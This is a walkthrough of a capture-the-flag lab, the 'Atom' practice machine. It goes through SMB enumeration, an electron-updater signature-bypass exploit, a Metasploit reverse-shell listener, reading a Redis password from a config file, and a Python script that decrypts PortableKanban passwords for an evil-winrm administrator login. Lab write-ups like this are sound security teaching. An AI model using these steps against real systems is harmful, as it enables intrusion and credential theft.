In this post, i would like to share a walkthrough on Atom Machine.
This room is been considered difficulty rated as a Medium machine
Information Gathering on Atom machine
Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
Let’s see the website interface.
Nothing that we can look on the website interface.
Based on the nmap result, I notice that port 445 is open which normally used for SMB service
For those are not familiar with SMB service, you guys can read over here
We can see the file stored in smb service by running smbclient -L //10.10.10.237/ and we notice that Software_Updates is saved as one of the sharename in the service.
Let’s enumerate the Software_Updates share name further by executing the command smbclient //10.10.10.237/Software_Updates -U ” “
For this activity, there’s no password is needed to proceed further
We have folder client1,client2 and client3 with a PDF file name UAT_Testing_Procedures.pdf
We can investigate the PDF file by downloading it using get UAT_Testing_Procedures.pdf into our machine.
Gaining the Access on Atom machine
There’s no file stored on either folder client1, client2 and client3
Before we put the latest.yml file into one of the folders, we need to read the PDF file such as below
Why need to put the latest.yml into the machine, it’s because we are using an electron-builder based on the PDF file above. I have done some research on the internet
We will be able to understand the exploit from the website Signature Validation Bypass Leading to RCE In Electron-Updater · Doyensec’s Blog
From my understanding of the PDF file, we need to do the step as shown below:
Firstly, we need to create a crafted exploit for us to get the reverse shell connection back to us.
We get the hashes on the crafted file by using sha512sum filename
# Reminder: We need to get a new sha512sum whenever we recreated the crafted malicious file #
We will be using cyberchef to encode it from Hex binary into base64 binary as shown above.
Maintaining the Access on Atom machine
Next, we need to use the Metasploit tool to get the reverse shell which we need to execute msfconsole command to start the Metasploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST <VPN's IP address>
set LPORT <PORT that you use on msfvenom exploit>
run
We will be moving on to the next step in the activity by creating latest.yml file
The file will look something such to shown in the screenshot above. We need to add the sha512 encode on the cyberchef website over here and save everything on latest.yml
We need to start our python server on the directory in that we save latest.yml
It will take a few seconds depending on our machine.
We managed to get the meterpreter session when we look back on the Metasploit terminal.
I should be able to penetrate the machine by executing shell -i command
We can read the user flag by typing the command “type C:\Users\jason\Desktop\user.txt“
Escalate to Root Privileges Access on Atom machine
We can get the Windows SUID from Winpeas.sh but i will find it manually.
Based on my experience, there should be a suspicious file stored on C:\Program Files\ and we managed to find Redis Folder.
When we look carefully at the Redis Folder, we notice that redis.windows-service.conf and redis.windows.conf did standout compared to another file over here.
We can read the conf file by using the command “type redis.windows-service.conf” and we have gotten a password kidvscat_yes_kidvscat
Based on my research on the redis tools, we found some information like below:
Now, we should install the redis-tools on our Kali Linux Machine by executing the command apt-get install redis-tools
It will take a while to complete
We need to execute. the command below for us to get the hash
redis-cli -h 10.10.10.237. -a kidvscat_yes_kidvscat
keys *
get pk:urn:user:e8e29158-d70d-44b1-a1ba-494d52790a0
Now, we managed to get the hashes and need to decrypt them to proceed to the next step. However, we don’t know how to decrypt it.
We found a PDF file named User Guide.pdf which is located at C:\Users\jason\Download\PortableKanban
Honestly, i never use PortableKanban in my entire life and we need to do some research on it.
What we should be getting is a python shell that is shown in the first result above (link here). An example of the script can be seen below
I stumbled upon an error on this python script because we don’t have PoratableKanban.pk3 installed on our Kali Linux OS. Let’s modify the code to meet our requirement for the machine
It will look something like the below:
import json
import base64
from des import * #python3 -m pip install des
try:
hash = str(input("Enter the Hash : "))
hash = base64.b64decode(hash.encode('utf-8'))
key = DesKey(b"7ly6UznJ")
print("Decrypted Password : " + key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8'))
except:
print("Wrong Hash")
For the script to be working well, you need to install des by executing pip3 install des
Once we have managed to install des, it works well. We just need to key-in the hash that we found earlier to get decrypted password
We need to run evil-winrm to get the root flag which the command is ruby evil-winrm -i 10.10.10.237 -u ‘administrator’ -p ‘kidvscat_admin_@123’
Once we are gains the Shell, we need to read the root flag at C:\Users\Administrator\Desktop directory. Finally, we can read it by using the command “type root.txt”
-THE END-
Happy Learning Guys!
No responses yet